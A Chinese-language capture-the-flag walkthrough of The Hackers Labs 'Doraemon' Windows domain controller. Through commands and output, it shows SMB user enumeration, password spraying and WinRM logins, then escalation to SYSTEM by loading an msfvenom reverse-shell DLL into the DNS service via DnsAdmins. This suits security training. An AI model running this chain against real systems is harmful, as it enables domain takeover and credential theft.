靶场:The Hackers Labs
地址:https://thehackerslabs.com/doraemon/
系统:windows
内容:smb brute、DnsAmins权限提权
首先扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 13:59 CST
Nmap scan report for 192.168.56.154
Host is up (0.00094s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 11:59:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-time:
| date: 2024-11-09T12:00:53
|_ start_date: 2024-11-09T11:49:47
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 5h39m59s, deviation: 34m38s, median: 5h59m59s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Domain name: DORAEMON.THL
| Forest name: DORAEMON.THL
| FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL
|_ System time: 2024-11-09T13:00:53+01:00
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c0:aa:e7 (VMware)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
以空账户查看smb目录,gorrocoptero为可读。
─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\null:
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ gorrocoptero READ
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ Users
爆破出所有的用户名,并保存为names.txt。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Doraemon
Nobita
Shizuka
Gigante
Suneo
保存所有的组名(其实也不用)。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeGroup\))'
Enterprise Domain Controllers de sólo lectura
Admins. del dominio
Usuarios del dominio
Invitados del dominio
Equipos del dominio
Controladores de dominio
Administradores de esquema
Administradores de empresas
Propietarios del creador de directivas de grupo
Controladores de dominio de sólo lectura
Controladores de dominio clonables
Protected Users
Administradores clave
Administradores clave de la organización
DnsAdmins
DnsUpdateProx
刚才smb共享目录里那个文件是一首我读不懂的对话,把它里面的每个词都拆开做成pass.txt,然后和刚才的用户名进行匹配。
└─$ cat kedadawapa.txt | tr -d ',.?!' | tr ' ' '\n' | sort -u > pass.txt
└─$ netexec smb $IP -u names.txt -p pass.txt --continue-on-success |grep '[+]'
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Invitado: (Guest)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\DefaultAccount: (Guest)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
检测一下,Doraemon用户可以登录。
└─$ netexec winrm $IP -u Doraemon -p Dorayaki1
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL)
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1 (Pwn3d!)
登录Doraemon的shell,但并没有直接可以用于提权的权限。
└─$ evil-winrm -i $IP -u Doraemon -p Dorayaki1
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Doraemon\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
浏览Links目录,发现一个隐藏文件。注意dir命令要加上-force参数。
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir -force
Directorio: C:\Users\Doraemon\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 10/1/2024 12:35 PM 58 Carta de amor a Shizuka.txt
*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
文件内容是Suneo的密码。
└─$ netexec winrm $IP -u names.txt -p ShizukaTeAmobb12345 | grep '[+]'
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345 (Pwn3d!)
登录Suneo的shell后,可以得到user flag。
为浏览信息方便,上传SharpHound,下载相关信息。在本机建立smb服务器。
└─$ impacket-smbserver -smb2support kali /opt/SharpHound
在客户机运行sharphound来收集域信息。
*Evil-WinRM* PS C:\Users\Doraemon\Documents> \\192.168.56.101\kali\SharpHound.exe
...
*Evil-WinRM* PS C:\Users\Doraemon\Documents> dir
Directorio: C:\Users\Doraemon\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/9/2024 2:25 PM 12205 20241109142502_BloodHound.zip
-a---- 11/9/2024 2:25 PM 8586 MjhiMTQyYmItYzllMS00ODVmLWFkZWItNmIwMGE2NTIyYWIx.bin
查看suneo用户,属于4个组,其中有一个DnsAdmin组。
*Evil-WinRM* PS C:\Users\Suneo\Documents> net user suneo
...
Miembros del grupo local *Dorayaki
*Usuarios de administr
Miembros del grupo global *DnsAdmins
*Usuarios del dominio
DnsAdmins的提权可参考如下文章。
https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
https://0xstarlight.github.io/posts/Active-Directory-Domain-Priv-Esc/
先用msfvenom生成一个反弹shell的dll文件。
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=1234 -f dll > malicious.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
在靶机上运行下面的命令,用于加载dll文件到dns服务,并重启dns服务。
*Evil-WinRM* PS C:\Users\Suneo\Documents> dnscmd 127.0.0.1 /config /serverlevelplugindll C:\Users\Suneo\Documents\malicious.dll
Propiedad del Registro serverlevelplugindll restablecida correctamente.
Comando completado correctamente.
C:\Users\Suneo\Documents>
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe stop dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
CàD_SALIDA_WIN32 : 0 (0x0)
CàD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIàN_INICIO : 0x0
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe start dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
CàD_SALIDA_WIN32 : 0 (0x0)
CàD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIàN_INICIO : 0x4e20
PID : 3700
MARCAS :
本机监听相关端口,可以得到root shell。
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.154] 50091
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami /priv
whoami /priv
INFORMACIN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripcin Estado
======================= ============================================ ==========
SeAuditPrivilege Generar auditoras de seguridad Habilitada
SeChangeNotifyPrivilege Omitir comprobacin de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticacin Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
C:\Windows\system32>whoami
whoami
nt authority\system